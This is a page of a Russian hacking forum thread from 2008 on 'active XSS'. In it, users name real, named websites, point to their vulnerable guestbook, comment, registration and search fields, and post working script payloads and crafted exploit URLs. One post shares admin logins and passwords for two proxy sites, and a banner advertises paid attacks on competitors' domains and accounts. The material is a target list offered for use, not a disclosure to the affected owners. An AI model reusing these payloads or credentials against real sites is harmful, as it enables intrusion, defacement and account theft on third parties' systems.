Активные Xss

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Активные Xss

Страница 19 из 54

« Первая

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

#181

24.05.2008, 21:57

КВР

Познающий

Регистрация: 23.04.2008

Сообщений: 39

С нами: 9499716

Репутация: 135

_http://checkproxy.nnm.netserv.name/
admin
123456

_http://queen-love.com/proxy5/
admin
123456

Юзайте и не просите больше никого о халявных прокси.

#182

27.05.2008, 22:42

echobyte

Постоянный

Регистрация: 07.03.2008

Сообщений: 568

С нами: 9567626

Репутация: 708

http://www.panvasoft.com/rus/5452/gb/

#183

30.05.2008, 21:48

sabe

Постоянный

Регистрация: 16.03.2007

Сообщений: 380

С нами: 10081287

Репутация: 568

Отправить сообщение для sabe с помощью AIM

Отправить сообщение для sabe с помощью Yahoo

Chronicle.com - Деньги

Цитата:

/forums/index.php?board=[XSS]
/forums/index.php?topic=[XSS]

#184

31.05.2008, 02:05

Kusto

Moderator - Level 7

Регистрация: 04.02.2007

Сообщений: 554

С нами: 10139306

Репутация: 1089

http://www.all-biz.info/ru/

при регистрации уязвимы пактически все поля(для активных XSS), вчастности поле "о предриятии", зарегиться до конца неудалось- за регу требют 35400 руб
ну а чтоб вам небыло скушно вот вам хоть и пассивная но тоже XSS)))
http://www.all-biz.info/ru/enterprises/?btn_search=1&findentry=%3Cscript%3Ealert%28%27%D0 %B1%D0%B0%D0%BC%D1%81%27%29%3C%2Fscript%3E&cs=&ac_ category=&btn_search=%D0%98%D1%81%D0%BA%D0%B0%D1%8 2%D1%8C

#185

31.05.2008, 16:15

Buffalon

Постоянный

Регистрация: 22.03.2008

Сообщений: 325

С нами: 9545988

Репутация: 63

http://o-sport.ru/guestbook/index.php

0Й... .Вводите в гостевой
<script>alert()</script>
и всё

#186

01.06.2008, 11:12

D9D9_VAD9

Участник форума

Регистрация: 15.04.2008

Сообщений: 149

С нами: 9511582

Репутация: 259

svadbann.ru

Гостевая книга
http://www.svadbann.ru/q_answer.html

Активны все три поля, сообщение, имя, мыло

#187

04.06.2008, 19:58

echobyte

Постоянный

Регистрация: 07.03.2008

Сообщений: 568

С нами: 9567626

Репутация: 708

http://classifieds.invictory.org
уязвимы обьявления

#188

08.06.2008, 12:55

~~otmorozok428~~

Banned

Регистрация: 19.10.2007

Сообщений: 152

С нами: 9769519

Репутация: 415

Сайт Российских Сутенёров

http://www.suter.ru/blacklist.html

POST-форма, поле "Дополнительно:
(краткое описание происшетшего)"

Цитата:

#189

09.06.2008, 18:15

fatalo

Участник форума

Регистрация: 15.05.2008

Сообщений: 166

С нами: 9467906

Репутация: 128

karaul.ru/
Xss найдена в добавление комментария.
Вот пример:

Код HTML:

_http://karaul.ru/30.12.2004/13/comments
_http://karaul.ru/09.06.2008/11/comments

В поле имя вводите стандартное:

PHP код:


		
			
<script>alert('antichat.ru')</script>

И получаете желаемое!Хочу сказать,что караул.ру является довольно посещаемым ресурсом.

#190

10.06.2008, 14:45

fatalo

Участник форума

Регистрация: 15.05.2008

Сообщений: 166

С нами: 9467906

Репутация: 128

www.skisport.ru
Оффициальный сайт журанала лыжный спорт.
Пример скрипта:

Код HTML:

http://www.skisport.ru/search/index.php?search=%3Cscript%3Ealert%28%27fatalo+for+antichat.ru%27%29%3C%2Fscript%3E&days=&dts=&dte=

У этого ресурса бажная функция поиска по сайту.
Как обычно пишем:

PHP код:


		
			
<script>alert('antichat.ru want you!')</script>

И творим добро =)

Страница 19 из 54

« Первая

Последняя »

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Xss для новичков	Micr0b	Уязвимости	79	06.07.2018 22:05
Xss	bx_N	Forum for discussion of ANTICHAT	7	11.03.2007 19:17
mylivepage.ru активные XSS	__XT__	Уязвимости	3	23.12.2006 14:31

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход